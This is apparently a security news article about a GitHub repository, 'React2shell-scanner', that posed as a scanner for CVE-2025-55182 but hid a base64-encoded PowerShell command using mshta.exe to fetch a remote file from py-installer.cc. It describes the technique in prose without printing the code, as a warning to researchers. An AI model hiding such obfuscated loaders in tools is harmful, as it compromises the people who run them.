Malicious GitHub Repository Impersonating CVE-2025-55182 Scanner Exposed
A GitHub repository masquerading as a vulnerability scanner for CVE-2025-55182, commonly known as “React2Shell,” was recently uncovered as a source of malware. The project, titled React2shell-scanner, was associated with the GitHub user niha0wa but has been removed from the platform after community alerts regarding its malicious intent surfaced.
Cybersecurity researcher Saurabh raised alarms on LinkedIn about the now-deleted tool last week after discovering suspicious behavior embedded in the code. His investigation revealed that the script contained a concealed payload designed to execute mshta.exe, enabling it to fetch a remote file from py-installer.cc. This method is a known technique for deploying secondary malware payloads.
A closer examination of the script confirmed Saurabh’s concerns. The malware was intricately embedded within react2shellpy.py, utilizing a section of base64-encoded strings that were decoded into a PowerShell command. This approach signifies an alarming tactic used by threat actors to obscure malicious intentions within seemingly benign software.
Targeting Windows systems, the malware leveraged mshta.exe, a legitimate Windows utility often exploited to execute harmful scripts without user notification or suspicion. This underhanded tactic turns what appears to be a beneficial security tool into a potential gateway for cyber compromise.
The deceptive scanner was ostensibly designed for security professionals investigating CVE-2025-55182, posing as a useful resource while simultaneously endangering those seeking to enhance their understanding of the vulnerability. By masquerading as a credible security application, it transformed routine research activities into potential threats for cybersecurity experts.
This incident comes on the heels of previous reports highlighting hackers embedding the new PyStoreRAT malware into utility tools on GitHub, specifically targeting OSINT and cybersecurity researchers. These alarming trends underscore the need for heightened vigilance in the cybersecurity community.
While GitHub took swift action to remove the repository, the situation serves as a potent reminder that tools associated with cybersecurity must be scrutinized carefully. The belief that software hosted on well-known platforms is inherently safe can lead to severe vulnerabilities and risks.
Saurabh’s warnings emphasize the importance of thorough code reviews before deploying any third-party tools, particularly those that claim to assist in vulnerability detection. Industry professionals are urged to remain wary of engaging with tools that lack clear authorship or exhibit obfuscated coding patterns.
Although the malicious script has been removed from GitHub, it is important to note that cached copies or forks may still exist in various forms. Researchers investigating CVE-2025-55182 or related vulnerabilities must remain alert to fake exploit tools, especially those that exhibit signs of obfuscation or encode unexpected callbacks.
In considering the tactics employed in this incident, adherence to the MITRE ATT&CK framework is essential. Focused on initial access through exploiting legitimate tools like mshta.exe, this attack exemplifies the risks associated with trusting sources that appear authentic. Cybersecurity professionals must continuously enhance their understanding and awareness to safeguard against these evolving threats.
